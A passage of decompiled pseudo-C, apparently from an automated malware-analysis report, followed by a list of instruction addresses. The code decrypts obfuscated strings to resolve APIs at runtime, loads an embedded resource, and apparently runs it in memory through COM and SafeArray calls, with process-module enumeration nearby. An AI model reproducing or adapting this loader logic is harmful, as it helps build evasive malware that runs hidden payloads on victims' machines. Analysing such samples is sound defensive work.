                                                                                                                                                                                                          						__eflags = _t448;
                                                                                                                                                                                                          						if(_t448 < 0) {
                                                                                                                                                                                                          							_t448 = (_t448 - 0x00000001 | 0xfffffc00) + 1;
                                                                                                                                                                                                          							__eflags = _t448;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						__eflags = _t448;
                                                                                                                                                                                                          						if(_t448 > 0) {
                                                                                                                                                                                                          							_t421 =  *(_t559 + 0x40) - _t448;
                                                                                                                                                                                                          							_push(_t421 + _t537);
                                                                                                                                                                                                          							_push(_t448);
                                                                                                                                                                                                          							_t422 = _t421 +  *((intOrPtr*)(_t559 + 0x44));
                                                                                                                                                                                                          							__eflags = _t422;
                                                                                                                                                                                                          							_push(_t422);
                                                                                                                                                                                                          							E00401560(0,  *((intOrPtr*)(_t559 + 0x58)));
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						E0040BA30(_t526,  *(_t559 + 0x3c), 0,  *(_t559 + 0x40));
                                                                                                                                                                                                          						_t560 = _t559 + 0xc;
                                                                                                                                                                                                          						FreeResource(_t551);
                                                                                                                                                                                                          						_t552 =  *_t537;
                                                                                                                                                                                                          						 *((intOrPtr*)(_t560 + 0x94)) = _t552;
                                                                                                                                                                                                          						_t358 = E0040B84D(0,  *(_t559 + 0x40), _t526, _t552); // executed
                                                                                                                                                                                                          						_t561 = _t560 + 4;
                                                                                                                                                                                                          						 *((intOrPtr*)(_t561 + 0x40)) = _t358;
                                                                                                                                                                                                          						_t359 = SizeofResource(_t526,  *(_t560 + 0x4c));
                                                                                                                                                                                                          						_t527 =  *((intOrPtr*)(_t561 + 0x38));
                                                                                                                                                                                                          						_t192 = _t537 + 4; // 0x4
                                                                                                                                                                                                          						E0040AC60(_t527, _t561 + 0x98, _t192, _t359);
                                                                                                                                                                                                          						E0040BA30(_t527, _t537, 0,  *((intOrPtr*)(_t561 + 0x50)));
                                                                                                                                                                                                          						_t528 = _t527 + 0xe;
                                                                                                                                                                                                          						 *((char*)(_t561 + 0x34)) = 0xce;
                                                                                                                                                                                                          						 *((char*)(_t561 + 0x35)) = 0x27;
                                                                                                                                                                                                          						 *((char*)(_t561 + 0x36)) = 0x9c;
                                                                                                                                                                                                          						 *((char*)(_t561 + 0x37)) = 0x1a;
                                                                                                                                                                                                          						 *((char*)(_t561 + 0x38)) = 0x95;
                                                                                                                                                                                                          						 *((char*)(_t561 + 0x39)) = 0x21;
                                                                                                                                                                                                          						 *((char*)(_t561 + 0x3a)) = 0x2e;
                                                                                                                                                                                                          						 *((char*)(_t561 + 0x3b)) = 0xd;
                                                                                                                                                                                                          						 *((char*)(_t561 + 0x3c)) = 0xdb;
                                                                                                                                                                                                          						 *((char*)(_t561 + 0x3d)) = 0x29;
                                                                                                                                                                                                          						 *((char*)(_t561 + 0x3e)) = 0x57;
                                                                                                                                                                                                          						 *((char*)(_t561 + 0x3f)) = 0x56;
                                                                                                                                                                                                          						 *((char*)(_t561 + 0x40)) = 0xf8;
                                                                                                                                                                                                          						 *((char*)(_t561 + 0x41)) = 0x98;
                                                                                                                                                                                                          						 *((char*)(_t561 + 0x42)) = 0x5b;
                                                                                                                                                                                                          						 *((char*)(_t561 + 0x43)) = 0xf4;
                                                                                                                                                                                                          						 *((char*)(_t561 + 0x44)) = 0xb5;
                                                                                                                                                                                                          						 *((char*)(_t561 + 0x45)) = 0x87;
                                                                                                                                                                                                          						 *((char*)(_t561 + 0x46)) = 0x7b;
                                                                                                                                                                                                          						 *((char*)(_t561 + 0x47)) = 0xf;
                                                                                                                                                                                                          						 *((char*)(_t561 + 0x48)) = 0xf4;
                                                                                                                                                                                                          						 *((char*)(_t561 + 0x49)) = 0x76;
                                                                                                                                                                                                          						 *((char*)(_t561 + 0x4a)) = 0xb9;
                                                                                                                                                                                                          						 *((char*)(_t561 + 0x4b)) = 0x34;
                                                                                                                                                                                                          						 *((char*)(_t561 + 0x4c)) = 0xbf;
                                                                                                                                                                                                          						 *((char*)(_t561 + 0x4d)) = 0x1e;
                                                                                                                                                                                                          						 *((char*)(_t561 + 0x4e)) = 0xe7;
                                                                                                                                                                                                          						 *((char*)(_t561 + 0x4f)) = 0x78;
                                                                                                                                                                                                          						 *((char*)(_t561 + 0x50)) = 0x98;
                                                                                                                                                                                                          						 *((char*)(_t561 + 0x51)) = 0xe9;
                                                                                                                                                                                                          						 *((char*)(_t561 + 0x52)) = 0x6f;
                                                                                                                                                                                                          						 *((char*)(_t561 + 0x53)) = 0xb4;
                                                                                                                                                                                                          						 *((char*)(_t561 + 0x54)) = 0;
                                                                                                                                                                                                          						_t364 = E00401650(_t561 + 0x30, _t561 + 0x110);
                                                                                                                                                                                                          						_t562 = _t561 + 0x24;
                                                                                                                                                                                                          						_t365 = LoadLibraryA(_t364); // executed
                                                                                                                                                                                                          						_t538 = _t365;
                                                                                                                                                                                                          						 *((char*)(_t562 + 0x10)) = 0xe0;
                                                                                                                                                                                                          						 *((char*)(_t562 + 0x11)) = 0x18;
                                                                                                                                                                                                          						 *((char*)(_t562 + 0x12)) = 0xad;
                                                                                                                                                                                                          						 *((char*)(_t562 + 0x13)) = 0x36;
                                                                                                                                                                                                          						 *((char*)(_t562 + 0x14)) = 0x95;
                                                                                                                                                                                                          						 *((char*)(_t562 + 0x15)) = 0x21;
                                                                                                                                                                                                          						_t451 = _t562 + 0x134;
                                                                                                                                                                                                          						 *((char*)(_t562 + 0x1e)) = 0x2a;
                                                                                                                                                                                                          						 *((char*)(_t562 + 0x1f)) = 0x57;
                                                                                                                                                                                                          						 *((char*)(_t562 + 0x20)) = 0xda;
                                                                                                                                                                                                          						 *((char*)(_t562 + 0x21)) = 0xc;
                                                                                                                                                                                                          						 *((char*)(_t562 + 0x22)) = 0x55;
                                                                                                                                                                                                          						 *((char*)(_t562 + 0x23)) = 0x25;
                                                                                                                                                                                                          						 *((char*)(_t562 + 0x24)) = 0x8c;
                                                                                                                                                                                                          						 *((char*)(_t562 + 0x25)) = 0xf9;
                                                                                                                                                                                                          						 *((char*)(_t562 + 0x26)) = 0x35;
                                                                                                                                                                                                          						 *((char*)(_t562 + 0x27)) = 0x97;
                                                                                                                                                                                                          						 *((char*)(_t562 + 0x28)) = 0xd0;
                                                                                                                                                                                                          						 *((char*)(_t562 + 0x29)) = 0x87;
                                                                                                                                                                                                          						 *((char*)(_t562 + 0x2a)) = 0x7b;
                                                                                                                                                                                                          						 *((char*)(_t562 + 0x2b)) = 0xf;
                                                                                                                                                                                                          						 *((char*)(_t562 + 0x2c)) = 0xf4;
                                                                                                                                                                                                          						 *((char*)(_t562 + 0x2d)) = 0x76;
                                                                                                                                                                                                          						 *((char*)(_t562 + 0x2e)) = 0xb9;
                                                                                                                                                                                                          						 *((char*)(_t562 + 0x2f)) = 0x34;
                                                                                                                                                                                                          						 *((char*)(_t562 + 0x30)) = 0xbf;
                                                                                                                                                                                                          						 *((char*)(_t562 + 0x31)) = 0x1e;
                                                                                                                                                                                                          						 *((char*)(_t562 + 0x32)) = 0xe7;
                                                                                                                                                                                                          						 *((char*)(_t562 + 0x33)) = 0x78;
                                                                                                                                                                                                          						 *((char*)(_t562 + 0x34)) = 0x98;
                                                                                                                                                                                                          						 *((char*)(_t562 + 0x35)) = 0xe9;
                                                                                                                                                                                                          						 *((char*)(_t562 + 0x36)) = 0x6f;
                                                                                                                                                                                                          						 *((char*)(_t562 + 0x37)) = 0xb4;
                                                                                                                                                                                                          						 *((char*)(_t562 + 0x38)) = 0;
                                                                                                                                                                                                          						_t366 = E00401650(_t562 + 0x14, _t451);
                                                                                                                                                                                                          						_t563 = _t562 + 8;
                                                                                                                                                                                                          						_t367 = GetProcAddress(_t365, _t366);
                                                                                                                                                                                                          						__eflags = _t367;
                                                                                                                                                                                                          						_t452 = _t451 & 0xffffff00 | _t367 != 0x00000000;
                                                                                                                                                                                                          						__eflags = _t452;
                                                                                                                                                                                                          						 *(_t563 + 0x47) = _t452 == 0;
                                                                                                                                                                                                          						 *0x423480 = _t367;
                                                                                                                                                                                                          						 *((intOrPtr*)(_t563 + 0x80)) = 0;
                                                                                                                                                                                                          						 *((intOrPtr*)(_t563 + 0x84)) = 0;
                                                                                                                                                                                                          						 *((intOrPtr*)(_t563 + 0x4c)) = 0;
                                                                                                                                                                                                          						 *(_t563 + 0x58) = 0;
                                                                                                                                                                                                          						 *(_t563 + 0x54) = 0;
                                                                                                                                                                                                          						__eflags = _t452;
                                                                                                                                                                                                          						if(_t452 != 0) {
                                                                                                                                                                                                          							_t368 =  *_t367(0x41b230, 0x41b220, _t563 + 0x80); // executed
                                                                                                                                                                                                          							__eflags = _t368;
                                                                                                                                                                                                          							if(_t368 >= 0) {
                                                                                                                                                                                                          								__eflags =  *(_t563 + 0x47);
                                                                                                                                                                                                          								if( *(_t563 + 0x47) == 0) {
                                                                                                                                                                                                          									 *((intOrPtr*)(_t563 + 0x17c)) = _t563 + 0x17c;
                                                                                                                                                                                                          									E004018F0( *((intOrPtr*)(_t563 + 0x38)), _t563 + 0x17c, _t563 + 0x17c,  *((intOrPtr*)(_t563 + 0x38)), 3);
                                                                                                                                                                                                          									_t376 =  *((intOrPtr*)(_t563 + 0x80));
                                                                                                                                                                                                          									_t378 =  *((intOrPtr*)( *((intOrPtr*)( *_t376 + 0xc))))(_t376,  *((intOrPtr*)(_t563 + 0x178)), 0x41b240, _t563 + 0x84); // executed
                                                                                                                                                                                                          									__eflags = _t378;
                                                                                                                                                                                                          									if(_t378 >= 0) {
                                                                                                                                                                                                          										_t381 =  *((intOrPtr*)(_t563 + 0x84));
                                                                                                                                                                                                          										_t383 =  *((intOrPtr*)( *((intOrPtr*)( *_t381 + 0x24))))(_t381, 0x41b210, 0x41b290, _t563 + 0x4c); // executed
                                                                                                                                                                                                          										__eflags = _t383;
                                                                                                                                                                                                          										if(_t383 >= 0) {
                                                                                                                                                                                                          											_t384 =  *((intOrPtr*)(_t563 + 0x4c));
                                                                                                                                                                                                          											_t385 =  *((intOrPtr*)( *((intOrPtr*)( *_t384 + 0x28))))(_t384); // executed
                                                                                                                                                                                                          											__eflags = _t385;
                                                                                                                                                                                                          											if(_t385 >= 0) {
                                                                                                                                                                                                          												 *((intOrPtr*)(_t563 + 0x38)) = 0;
                                                                                                                                                                                                          												E00401870(_t563 + 0x44, _t552, "_._");
                                                                                                                                                                                                          												_t539 = __imp__#8;
                                                                                                                                                                                                          												 *((intOrPtr*)(_t563 + 0x40)) = 0;
                                                                                                                                                                                                          												 *_t539(_t563 + 0x94);
                                                                                                                                                                                                          												E00401870(_t563 + 0x3c, _t552, "___");
                                                                                                                                                                                                          												 *_t539(_t563 + 0xa4);
                                                                                                                                                                                                          												 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t563 + 0x4c)))) + 0x34))))( *((intOrPtr*)(_t563 + 0x50)), E004018D0(_t563 + 0x58)); // executed
                                                                                                                                                                                                          												_t542 =  *(_t563 + 0x58);
                                                                                                                                                                                                          												__eflags = _t542;
                                                                                                                                                                                                          												if(_t542 == 0) {
                                                                                                                                                                                                          													E0040AD90(0x80004003);
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												_t396 =  *((intOrPtr*)( *((intOrPtr*)( *_t542))))(_t542, 0x41b270, E004018D0(_t563 + 0x54));
                                                                                                                                                                                                          												 *((intOrPtr*)(_t563 + 0x94)) = _t552 + 0xfffffff2;
                                                                                                                                                                                                          												 *((intOrPtr*)(_t563 + 0x98)) = 0;
                                                                                                                                                                                                          												__imp__#15(0x11, 1, _t563 + 0x88); // executed
                                                                                                                                                                                                          												_t543 = _t396;
                                                                                                                                                                                                          												 *((intOrPtr*)(_t563 + 0x50)) = 0;
                                                                                                                                                                                                          												__imp__#23(_t543, _t563 + 0x48);
                                                                                                                                                                                                          												E0040B350(0, _t528, _t543,  *((intOrPtr*)(_t563 + 0x48)), _t528, _t552 + 0xfffffff2);
                                                                                                                                                                                                          												_t564 = _t563 + 0xc;
                                                                                                                                                                                                          												__imp__#24(_t543);
                                                                                                                                                                                                          												_t399 =  *(_t564 + 0x54);
                                                                                                                                                                                                          												__eflags = _t399;
                                                                                                                                                                                                          												if(_t399 == 0) {
                                                                                                                                                                                                          													_t399 = E0040AD90(0x80004003);
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												 *((intOrPtr*)( *((intOrPtr*)( *_t399 + 0xb4))))(_t399, _t543, E004018D0(_t564 + 0x34)); // executed
                                                                                                                                                                                                          												__eflags = _t543;
                                                                                                                                                                                                          												if(_t543 != 0) {
                                                                                                                                                                                                          													__imp__#16(_t543);
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												_t402 =  *(_t564 + 0x34);
                                                                                                                                                                                                          												__eflags = _t402;
                                                                                                                                                                                                          												if(_t402 == 0) {
                                                                                                                                                                                                          													_t402 = E0040AD90(0x80004003);
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												_t469 =  *(_t564 + 0x40);
                                                                                                                                                                                                          												_t555 = _t402;
                                                                                                                                                                                                          												__eflags = _t469;
                                                                                                                                                                                                          												if(_t469 == 0) {
                                                                                                                                                                                                          													_t531 = 0;
                                                                                                                                                                                                          													__eflags = 0;
                                                                                                                                                                                                          												} else {
                                                                                                                                                                                                          													_t531 =  *_t469;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												 *((intOrPtr*)( *((intOrPtr*)( *_t402 + 0x44))))(_t555, _t531, E004018D0(_t564 + 0x3c)); // executed
                                                                                                                                                                                                          												__imp__#411(0xc, 0, 0);
                                                                                                                                                                                                          												_t471 =  *(_t564 + 0x3c);
                                                                                                                                                                                                          												__eflags = _t471;
                                                                                                                                                                                                          												if(_t471 == 0) {
                                                                                                                                                                                                          													E0040AD90(0x80004003);
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												_t405 =  *(_t564 + 0x38);
                                                                                                                                                                                                          												__eflags = _t405;
                                                                                                                                                                                                          												if(_t405 == 0) {
                                                                                                                                                                                                          													_t514 = 0;
                                                                                                                                                                                                          													__eflags = 0;
                                                                                                                                                                                                          												} else {
                                                                                                                                                                                                          													_t514 =  *_t405;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												_t563 = _t564 - 0x10;
                                                                                                                                                                                                          												_t407 = _t563;
                                                                                                                                                                                                          												 *_t407 =  *((intOrPtr*)(_t564 + 0x94));
                                                                                                                                                                                                          												 *((intOrPtr*)(_t407 + 4)) =  *((intOrPtr*)(_t563 + 0xb0));
                                                                                                                                                                                                          												 *((intOrPtr*)(_t407 + 8)) =  *((intOrPtr*)(_t563 + 0xb8));
                                                                                                                                                                                                          												_t528 =  *((intOrPtr*)(_t563 + 0xc0));
                                                                                                                                                                                                          												 *((intOrPtr*)(_t407 + 0xc)) =  *((intOrPtr*)(_t563 + 0xc0));
                                                                                                                                                                                                          												 *((intOrPtr*)( *((intOrPtr*)( *_t471 + 0xe4))))(_t471, _t514, 0x118, 0, 0, _t564 + 0xa4);
                                                                                                                                                                                                          												_t538 = __imp__#9; // 0x742dcf00
                                                                                                                                                                                                          												_t538->i(_t563 + 0xa4);
                                                                                                                                                                                                          												E004019A0(_t563 + 0x38);
                                                                                                                                                                                                          												_t538->i(_t563 + 0x94);
                                                                                                                                                                                                          												_t413 =  *(_t563 + 0x3c);
                                                                                                                                                                                                          												__eflags = _t413;
                                                                                                                                                                                                          												if(_t413 != 0) {
                                                                                                                                                                                                          													 *((intOrPtr*)( *((intOrPtr*)( *_t413 + 8))))(_t413);
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												E004019A0(_t563 + 0x40);
                                                                                                                                                                                                          												_t415 =  *(_t563 + 0x34);
                                                                                                                                                                                                          												__eflags = _t415;
                                                                                                                                                                                                          												if(_t415 != 0) {
                                                                                                                                                                                                          													 *((intOrPtr*)( *((intOrPtr*)( *_t415 + 8))))(_t415);
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									_t379 =  *((intOrPtr*)(_t563 + 0x174));
                                                                                                                                                                                                          									__eflags = _t379 - _t563 + 0x178;
                                                                                                                                                                                                          									if(__eflags != 0) {
                                                                                                                                                                                                          										_push(_t379);
                                                                                                                                                                                                          										E0040B6B5(0, _t528, _t538, __eflags);
                                                                                                                                                                                                          										_t563 = _t563 + 4;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_t369 =  *(_t563 + 0x54);
                                                                                                                                                                                                          							__eflags = _t369;
                                                                                                                                                                                                          							if(_t369 != 0) {
                                                                                                                                                                                                          								 *((intOrPtr*)( *((intOrPtr*)( *_t369 + 8))))(_t369);
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_t370 =  *(_t563 + 0x58);
                                                                                                                                                                                                          							__eflags = _t370;
                                                                                                                                                                                                          							if(_t370 != 0) {
                                                                                                                                                                                                          								 *((intOrPtr*)( *((intOrPtr*)( *_t370 + 8))))(_t370);
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						goto L80;
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						_t428 = E00401650(_t557 + 0x60, _t557 + 0xd4);
                                                                                                                                                                                                          						_t565 = _t557 + 8;
                                                                                                                                                                                                          						_t547 = _t428;
                                                                                                                                                                                                          						_t520 = _t565 + 0x298;
                                                                                                                                                                                                          						while(1) {
                                                                                                                                                                                                          							_t429 =  *_t520;
                                                                                                                                                                                                          							if(_t429 !=  *_t547) {
                                                                                                                                                                                                          								break;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							if(_t429 == 0) {
                                                                                                                                                                                                          								L7:
                                                                                                                                                                                                          								_t429 = 0;
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          								_t493 =  *((intOrPtr*)(_t520 + 1));
                                                                                                                                                                                                          								if(_t493 !=  *((intOrPtr*)(_t547 + 1))) {
                                                                                                                                                                                                          									break;
                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                          									_t520 = _t520 + 2;
                                                                                                                                                                                                          									_t547 = _t547 + 2;
                                                                                                                                                                                                          									if(_t493 != 0) {
                                                                                                                                                                                                          										continue;
                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                          										goto L7;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							L9:
                                                                                                                                                                                                          							if(_t429 != 0) {
                                                                                                                                                                                                          								_t431 = E00401650(_t565 + 0x14, _t565 + 0xb4);
                                                                                                                                                                                                          								_t557 = _t565 + 8;
                                                                                                                                                                                                          								_t548 = _t431;
                                                                                                                                                                                                          								_t488 = _t557 + 0x298;
                                                                                                                                                                                                          								while(1) {
                                                                                                                                                                                                          									_t432 =  *_t488;
                                                                                                                                                                                                          									__eflags = _t432 -  *_t548;
                                                                                                                                                                                                          									if(_t432 !=  *_t548) {
                                                                                                                                                                                                          										break;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									__eflags = _t432;
                                                                                                                                                                                                          									if(_t432 == 0) {
                                                                                                                                                                                                          										L16:
                                                                                                                                                                                                          										_t432 = 0;
                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                          										_t432 =  *((intOrPtr*)(_t488 + 1));
                                                                                                                                                                                                          										__eflags = _t432 -  *((intOrPtr*)(_t548 + 1));
                                                                                                                                                                                                          										if(_t432 !=  *((intOrPtr*)(_t548 + 1))) {
                                                                                                                                                                                                          											break;
                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                          											_t488 = _t488 + 2;
                                                                                                                                                                                                          											_t548 = _t548 + 2;
                                                                                                                                                                                                          											__eflags = _t432;
                                                                                                                                                                                                          											if(_t432 != 0) {
                                                                                                                                                                                                          												continue;
                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                          												goto L16;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									L18:
                                                                                                                                                                                                          									__eflags = _t432;
                                                                                                                                                                                                          									if(_t432 == 0) {
                                                                                                                                                                                                          										goto L10;
                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                          										_t435 = Module32Next(_t525, _t557 + 0x278);
                                                                                                                                                                                                          										__eflags = _t435;
                                                                                                                                                                                                          										if(_t435 != 0) {
                                                                                                                                                                                                          											do {
                                                                                                                                                                                                          												_t437 = E00401650(_t557 + 0x60, _t557 + 0xd4);
                                                                                                                                                                                                          												_t566 = _t557 + 8;
                                                                                                                                                                                                          												_t549 = _t437;
                                                                                                                                                                                                          												_t490 = _t566 + 0x298;
                                                                                                                                                                                                          												while(1) {
                                                                                                                                                                                                          													_t438 =  *_t490;
                                                                                                                                                                                                          													__eflags = _t438 -  *_t549;
                                                                                                                                                                                                          													if(_t438 !=  *_t549) {
                                                                                                                                                                                                          														break;
                                                                                                                                                                                                          													}
                                                                                                                                                                                                          													__eflags = _t438;
                                                                                                                                                                                                          													if(_t438 == 0) {
                                                                                                                                                                                                          														L26:
                                                                                                                                                                                                          														_t438 = 0;
                                                                                                                                                                                                          													} else {
                                                                                                                                                                                                          														_t438 =  *((intOrPtr*)(_t490 + 1));
                                                                                                                                                                                                          														__eflags = _t438 -  *((intOrPtr*)(_t549 + 1));
                                                                                                                                                                                                          														if(_t438 !=  *((intOrPtr*)(_t549 + 1))) {
                                                                                                                                                                                                          															break;
                                                                                                                                                                                                          														} else {
                                                                                                                                                                                                          															_t490 = _t490 + 2;
                                                                                                                                                                                                          															_t549 = _t549 + 2;
                                                                                                                                                                                                          															__eflags = _t438;
                                                                                                                                                                                                          															if(_t438 != 0) {
                                                                                                                                                                                                          																continue;
                                                                                                                                                                                                          															} else {
                                                                                                                                                                                                          																goto L26;
                                                                                                                                                                                                          															}
                                                                                                                                                                                                          														}
                                                                                                                                                                                                          													}
                                                                                                                                                                                                          													L28:
                                                                                                                                                                                                          													__eflags = _t438;
                                                                                                                                                                                                          													if(_t438 == 0) {
                                                                                                                                                                                                          														goto L10;
                                                                                                                                                                                                          													} else {
                                                                                                                                                                                                          														_t439 = E00401650(_t566 + 0x14, _t566 + 0xb4);
                                                                                                                                                                                                          														_t557 = _t566 + 8;
                                                                                                                                                                                                          														_t550 = _t439;
                                                                                                                                                                                                          														_t492 = _t557 + 0x298;
                                                                                                                                                                                                          														while(1) {
                                                                                                                                                                                                          															_t440 =  *_t492;
                                                                                                                                                                                                          															__eflags = _t440 -  *_t550;
                                                                                                                                                                                                          															if(_t440 !=  *_t550) {
                                                                                                                                                                                                          																break;
                                                                                                                                                                                                          															}
                                                                                                                                                                                                          															__eflags = _t440;
                                                                                                                                                                                                          															if(_t440 == 0) {
                                                                                                                                                                                                          																L34:
                                                                                                                                                                                                          																_t440 = 0;
                                                                                                                                                                                                          															} else {
                                                                                                                                                                                                          																_t440 =  *((intOrPtr*)(_t492 + 1));
                                                                                                                                                                                                          																__eflags = _t440 -  *((intOrPtr*)(_t550 + 1));
                                                                                                                                                                                                          																if(_t440 !=  *((intOrPtr*)(_t550 + 1))) {
                                                                                                                                                                                                          																	break;
                                                                                                                                                                                                          																} else {
                                                                                                                                                                                                          																	_t492 = _t492 + 2;
                                                                                                                                                                                                          																	_t550 = _t550 + 2;
                                                                                                                                                                                                          																	__eflags = _t440;
                                                                                                                                                                                                          																	if(_t440 != 0) {
                                                                                                                                                                                                          																		continue;
                                                                                                                                                                                                          																	} else {
                                                                                                                                                                                                          																		goto L34;
                                                                                                                                                                                                          																	}
                                                                                                                                                                                                          																}
                                                                                                                                                                                                          															}
                                                                                                                                                                                                          															L36:
                                                                                                                                                                                                          															__eflags = _t440;
                                                                                                                                                                                                          															if(_t440 == 0) {
                                                                                                                                                                                                          																goto L10;
                                                                                                                                                                                                          															} else {
                                                                                                                                                                                                          																goto L37;
                                                                                                                                                                                                          															}
                                                                                                                                                                                                          															goto L81;
                                                                                                                                                                                                          														}
                                                                                                                                                                                                          														asm("sbb eax, eax");
                                                                                                                                                                                                          														asm("sbb eax, 0xffffffff");
                                                                                                                                                                                                          														goto L36;
                                                                                                                                                                                                          													}
                                                                                                                                                                                                          													goto L81;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												asm("sbb eax, eax");
                                                                                                                                                                                                          												asm("sbb eax, 0xffffffff");
                                                                                                                                                                                                          												goto L28;
                                                                                                                                                                                                          												L37:
                                                                                                                                                                                                          												_t442 = Module32Next(_t525, _t557 + 0x278);
                                                                                                                                                                                                          												__eflags = _t442;
                                                                                                                                                                                                          											} while (_t442 != 0);
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										goto L38;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									goto L81;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								asm("sbb eax, eax");
                                                                                                                                                                                                          								asm("sbb eax, 0xffffffff");
                                                                                                                                                                                                          								goto L18;
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          								L10:
                                                                                                                                                                                                          								CloseHandle(_t525);
                                                                                                                                                                                                          								return 0;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							goto L81;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						asm("sbb eax, eax");
                                                                                                                                                                                                          						asm("sbb eax, 0xffffffff");
                                                                                                                                                                                                          						goto L9;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				L81:
                                                                                                                                                                                                          			}

































































































                                                                                                                                                                                                          0x004019f0
                                                                                                                                                                                                          0x004019f0
                                                                                                                                                                                                          0x004019fd
                                                                                                                                                                                                          0x00401a10
                                                                                                                                                                                                          0x00401a15
                                                                                                                                                                                                          0x00401a1a
                                                                                                                                                                                                          0x00401a1f
                                                                                                                                                                                                          0x00401a24
                                                                                                                                                                                                          0x00401a29
                                                                                                                                                                                                          0x00401a2e
                                                                                                                                                                                                          0x00401a33
                                                                                                                                                                                                          0x00401a38
                                                                                                                                                                                                          0x00401a3d
                                                                                                                                                                                                          0x00401a42
                                                                                                                                                                                                          0x00401a47
                                                                                                                                                                                                          0x00401a4c
                                                                                                                                                                                                          0x00401a51
                                                                                                                                                                                                          0x00401a56
                                                                                                                                                                                                          0x00401a5b
                                                                                                                                                                                                          0x00401a60
                                                                                                                                                                                                          0x00401a65
                                                                                                                                                                                                          0x00401a6a
                                                                                                                                                                                                          0x00401a6f
                                                                                                                                                                                                          0x00401a74
                                                                                                                                                                                                          0x00401a79
                                                                                                                                                                                                          0x00401a7e
                                                                                                                                                                                                          0x00401a83
                                                                                                                                                                                                          0x00401a88
                                                                                                                                                                                                          0x00401a8d
                                                                                                                                                                                                          0x00401a92
                                                                                                                                                                                                          0x00401a97
                                                                                                                                                                                                          0x00401a9c
                                                                                                                                                                                                          0x00401aa1
                                                                                                                                                                                                          0x00401aa6
                                                                                                                                                                                                          0x00401aab
                                                                                                                                                                                                          0x00401ab0
                                                                                                                                                                                                          0x00401ab9
                                                                                                                                                                                                          0x00401aba
                                                                                                                                                                                                          0x00401abf
                                                                                                                                                                                                          0x00401ac7
                                                                                                                                                                                                          0x0040248d
                                                                                                                                                                                                          0x0040248d
                                                                                                                                                                                                          0x00402496
                                                                                                                                                                                                          0x00401acd
                                                                                                                                                                                                          0x00401ad6
                                                                                                                                                                                                          0x00401ae2
                                                                                                                                                                                                          0x00401ae6
                                                                                                                                                                                                          0x00401af1
                                                                                                                                                                                                          0x00401af6
                                                                                                                                                                                                          0x00401afb
                                                                                                                                                                                                          0x00401b00
                                                                                                                                                                                                          0x00401b05
                                                                                                                                                                                                          0x00401b0a
                                                                                                                                                                                                          0x00401b0f
                                                                                                                                                                                                          0x00401b14
                                                                                                                                                                                                          0x00401b19
                                                                                                                                                                                                          0x00401b1e
                                                                                                                                                                                                          0x00401b23
                                                                                                                                                                                                          0x00401b28
                                                                                                                                                                                                          0x00401b2d
                                                                                                                                                                                                          0x00401b32
                                                                                                                                                                                                          0x00401b37
                                                                                                                                                                                                          0x00401b3c
                                                                                                                                                                                                          0x00401b41
                                                                                                                                                                                                          0x00401b46
                                                                                                                                                                                                          0x00401b4b
                                                                                                                                                                                                          0x00401b50
                                                                                                                                                                                                          0x00401b55
                                                                                                                                                                                                          0x00401b5a
                                                                                                                                                                                                          0x00401b5f
                                                                                                                                                                                                          0x00401b64
                                                                                                                                                                                                          0x00401b69
                                                                                                                                                                                                          0x00401b6e
                                                                                                                                                                                                          0x00401b73
                                                                                                                                                                                                          0x00401b78
                                                                                                                                                                                                          0x00401b7d
                                                                                                                                                                                                          0x00401b85
                                                                                                                                                                                                          0x00401b8d
                                                                                                                                                                                                          0x00401b95
                                                                                                                                                                                                          0x00401b9d
                                                                                                                                                                                                          0x00401ba4
                                                                                                                                                                                                          0x00401ba9
                                                                                                                                                                                                          0x00401bae
                                                                                                                                                                                                          0x00401bb3
                                                                                                                                                                                                          0x00401bb8
                                                                                                                                                                                                          0x00401bbd
                                                                                                                                                                                                          0x00401bc2
                                                                                                                                                                                                          0x00401bc7
                                                                                                                                                                                                          0x00401bcc
                                                                                                                                                                                                          0x00401bd1
                                                                                                                                                                                                          0x00401bd6
                                                                                                                                                                                                          0x00401bdb
                                                                                                                                                                                                          0x00401be0
                                                                                                                                                                                                          0x00401be5
                                                                                                                                                                                                          0x00401bea
                                                                                                                                                                                                          0x00401bef
                                                                                                                                                                                                          0x00401bf4
                                                                                                                                                                                                          0x00401bf9
                                                                                                                                                                                                          0x00401bfe
                                                                                                                                                                                                          0x00401c03
                                                                                                                                                                                                          0x00401c08
                                                                                                                                                                                                          0x00401c0d
                                                                                                                                                                                                          0x00401c12
                                                                                                                                                                                                          0x00401c17
                                                                                                                                                                                                          0x00401c1c
